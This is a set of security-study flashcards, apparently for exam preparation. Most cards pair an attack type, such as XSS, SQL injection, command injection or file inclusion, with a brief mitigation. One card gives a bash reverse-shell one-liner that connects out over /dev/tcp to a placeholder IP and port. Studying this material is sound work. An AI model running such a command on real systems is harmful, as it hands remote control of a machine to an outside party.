ATTACKS Flashcards
Elicitation attack
obtaining information without directly asking for it
Spear Phishing
targets specific individuals or groups within an org
Reflected XSS
input sanitization (< >…)
SQL Injection Stacked
parameterized queries
DOM XSS
input sanitization (< > …)
Local File Inclusion
sandbox req
Command Injection
sandbox req
SQL Injection Union
Parameterized queries
SQL Injection ERROR
parametrized queries
Remote File Inclusion
Sandbox
Command injection
input sanitization $
URL Redirect
prevent external calls
Zigbee
IoT
internet of things
Zigbee is a wireless technology developed as an open global standard to address the unique needs of low-cost, low-power wireless IoT networks.
Reverse Shell
bash -i >& /dev/tcp/[dest ip]/[port] 0>&1
Point in Time Assessment
Compliance-based & Goals-based assessments.